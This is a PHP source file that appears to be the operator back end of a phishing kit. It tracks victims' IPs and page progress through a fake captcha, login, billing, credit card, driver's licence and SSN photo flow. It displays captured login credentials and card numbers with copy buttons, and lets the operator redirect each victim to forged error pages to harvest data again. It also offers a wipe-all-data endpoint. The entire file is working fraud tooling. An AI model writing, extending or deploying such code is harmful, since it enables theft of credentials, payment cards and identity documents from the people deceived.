<?php
require 'panel.php';
require 'captcha_config.php';
$panel = new Panel;

if(isset($_POST['toggleCaptcha'])){
    $current = isCaptchaEnabled();
    setCaptchaEnabled(!$current);
    echo json_encode(['enabled' => !$current]);
    exit;
}

if(isset($_POST['getCaptchaStatus'])){
    echo json_encode(['enabled' => isCaptchaEnabled()]);
    exit;
}

if(isset($_POST['eraseData'])){
    $panel->resetPanel();
    echo "All data has been wiped out successfully.";
}

if(isset($_POST['redirectionListener'])){
    $redirection = $panel->getCol("redirection");
    echo ($redirection === null || $redirection === "" || $redirection === "0") ? "0" : trim(str_replace(" ", "", $redirection));
}

if(isset($_POST['clearRedirection'])){
    $panel->updateCol("redirection", "0", $panel->getCol("id"));
}

if(isset($_POST['keepAlive'])){
    $userId = $panel->getCol("id");
    if($userId){
        $currentPage = $_POST['page'] ?? '';
        $panel->updateCol("last_act", time(), $userId);
        $panel->updateCol("current_page", $currentPage, $userId);
        if(isset($_POST['clearActivity'])){
            $panel->updateCol("activity", "On page: " . $currentPage, $userId);
        }
    }
}

if(isset($_POST['activity'])){
    $userId = $panel->getCol("id");
    if($userId) $panel->updateCol("activity", $_POST['statu'], $userId);
}

if(isset($_POST['redirect'])){
    $panel->updateCol("redirection", $_POST['pageID'], $_POST['vicID']);
    echo "OK";
}

if(isset($_POST['getUsersArchive'])) getOnlineUsers("archive");
if(isset($_POST['getOnlineUsers'])) getOnlineUsers("live");

function getPageStep($pageName) {
    $pageSteps = [
        'captcha.php' => ['step' => 1, 'name' => 'Step 1: Captcha', 'total' => 6],
        'index.php' => ['step' => 2, 'name' => 'Step 2: Login', 'total' => 6],
        'billing.php' => ['step' => 3, 'name' => 'Step 3: Billing', 'total' => 6],
        'card.php' => ['step' => 4, 'name' => 'Step 4: Credit Card', 'total' => 6],
        'photo_id.php' => ['step' => 5, 'name' => "Step 5: Photo ID (Driver's License)", 'total' => 6],
        'photo_ssn.php' => ['step' => 6, 'name' => 'Step 6: Photo ID (SSN)', 'total' => 6],
        'done.php' => ['step' => 7, 'name' => 'Complete', 'total' => 6]
    ];
    foreach($pageSteps as $page => $info) {
        if(strpos($pageName, $page) !== false) return $info;
    }
    return ['step' => 0, 'name' => $pageName, 'total' => 6];
}

function getOnlineUsers($mode){
    global $pdo;
    $activeWindow = 60;
    $getOnlines = ($mode=="archive") 
        ? $pdo->query("SELECT * FROM users ORDER BY last_act DESC")
        : $pdo->query("SELECT * FROM users WHERE last_act > ".(time() - $activeWindow));
    $rows = $getOnlines->fetchAll(PDO::FETCH_ASSOC);
    if(!$rows){
        echo '<div class="empty-state"><i class="fas fa-user-slash"></i><p>No active users.<br><span style="font-size: 14px; color: #999;">Waiting for connections...</span></p></div>';
        return;
    }
    $res = '<table class="table"><thead><tr>
        <th><i class="fas fa-hashtag"></i> ID</th>
        <th><i class="fas fa-globe"></i> IP</th>
        <th><i class="fas fa-file-alt"></i> Current Page</th>
        <th><i class="fas fa-user-clock"></i> Activity</th>
        <th><i class="fas fa-key"></i> LOGIN</th>
        <th><i class="fas fa-credit-card"></i> CARD</th>
        <th><i class="fas fa-exchange-alt"></i> Redirections</th>
    </tr></thead><tbody>';
    foreach($rows as $row){
        $isOnline = ($mode=="live" || ($mode=="archive" && $row['last_act'] > (time() - $activeWindow))) ? "table-success" : "table-danger";
        $statusBadge = ($isOnline=="table-success") ? '<span class="badge badge-online"><i class="fas fa-circle" style="font-size: 6px;"></i> Online</span>' : '<span class="badge badge-offline">Offline</span>';
        $pageInfo = getPageStep($row['current_page']);
        $stepNum = $pageInfo['step'];
        $stepPercent = $stepNum > 0 ? round(($stepNum / $pageInfo['total']) * 100) : 0;
        $progressBar = $stepNum > 0 ? '<div style="margin-top: 8px;"><div style="background: #e5e7eb; height: 6px; border-radius: 3px; overflow: hidden;"><div style="background: linear-gradient(135deg, #003087 0%, #009cde 100%); height: 100%; width: '.$stepPercent.'%;"></div></div><div style="font-size: 10px; color: #666; margin-top: 4px;">'.$stepPercent.'%</div></div>' : '';
        $stepDisplay = $stepNum > 0 ? '<span style="background: linear-gradient(135deg, #003087 0%, #009cde 100%); color: white; padding: 6px 12px; border-radius: 12px; font-size: 12px; font-weight: 700;">STEP '.$stepNum.'/'.$pageInfo['total'].'</span>' : '';
        $pageNameDisplay = $pageInfo['step'] > 0 ? $pageInfo['name'] : htmlspecialchars($row['current_page']);
        $log_login_esc = htmlspecialchars($row['log_login'] ?? '', ENT_QUOTES, 'UTF-8');
        $log_cc_esc = htmlspecialchars($row['log_cc'] ?? '', ENT_QUOTES, 'UTF-8');
        $res .= '<tr class="'.$isOnline.'">
            <td><strong>#'.$row['id'].'</strong></td>
            <td><code style="background: #f3f4f6; padding: 4px 8px; border-radius: 4px; font-size: 12px;">'.$row['ip'].'</code></td>
            <td style="min-width: 200px;"><div>'.$stepDisplay.' <span class="badge badge-page">'.$pageNameDisplay.'</span></div>'.$progressBar.'</td>
            <td>'.$statusBadge.'<div style="margin-top: 6px; font-size: 12px; color: #666;">'.htmlspecialchars($row['activity'] ?? 'N/A').'</div></td>
            <td><div class="data-cell">'.($row['log_login'] ? htmlspecialchars($row['log_login']) : '<span style="color: #999;">-</span>').'</div>'.($row['log_login'] ? '<button class="btn-copy" onclick="doCopy(\''.$log_login_esc.'\')"><i class="fas fa-copy"></i> Copy</button>' : '').'</td>
            <td><div class="data-cell">'.($row['log_cc'] ? htmlspecialchars($row['log_cc']) : '<span style="color: #999;">-</span>').'</div>'.($row['log_cc'] ? '<button class="btn-copy" onclick="doCopy(\''.$log_cc_esc.'\')"><i class="fas fa-copy"></i> Copy</button>' : '').'</td>
            <td><div class="redirect-buttons">
                <button class="btn-redirect btn-redirect-normal" onclick="redirect(1,'.$row['id'].')"><i class="fas fa-shield-alt"></i> CAPTCHA</button>
                <button class="btn-redirect btn-redirect-normal" onclick="redirect(2,'.$row['id'].')"><i class="fas fa-sign-in-alt"></i> LOGIN</button>
                <button class="btn-redirect btn-redirect-error" onclick="redirect(3,'.$row['id'].')"><i class="fas fa-exclamation-triangle"></i> LOGIN ERROR</button>
                <button class="btn-redirect btn-redirect-normal" onclick="redirect(4,'.$row['id'].')"><i class="fas fa-address-card"></i> BILLING</button>
                <button class="btn-redirect btn-redirect-error" onclick="redirect(5,'.$row['id'].')"><i class="fas fa-exclamation-triangle"></i> BILLING ERROR</button>
                <button class="btn-redirect btn-redirect-normal" onclick="redirect(6,'.$row['id'].')"><i class="fas fa-credit-card"></i> CARD</button>
                <button class="btn-redirect btn-redirect-error" onclick="redirect(7,'.$row['id'].')"><i class="fas fa-exclamation-triangle"></i> CARD ERROR</button>
                <button class="btn-redirect btn-redirect-normal" onclick="redirect(8,'.$row['id'].')"><i class="fas fa-id-card"></i> PHOTO ID</button>
                <button class="btn-redirect btn-redirect-error" onclick="redirect(9,'.$row['id'].')"><i class="fas fa-exclamation-triangle"></i> PHOTO ID ERROR</button>
                <button class="btn-redirect btn-redirect-normal" onclick="redirect(10,'.$row['id'].')"><i class="fas fa-id-badge"></i> SSN</button>
                <button class="btn-redirect btn-redirect-error" onclick="redirect(11,'.$row['id'].')"><i class="fas fa-exclamation-triangle"></i> SSN ERROR</button>
                <button class="btn-redirect btn-redirect-normal" onclick="redirect(12,'.$row['id'].')"><i class="fas fa-check-circle"></i> DONE</button>
            </div></td>
        </tr>';
    }
    $res .= '</tbody></table>';
    echo $res;
}
?>
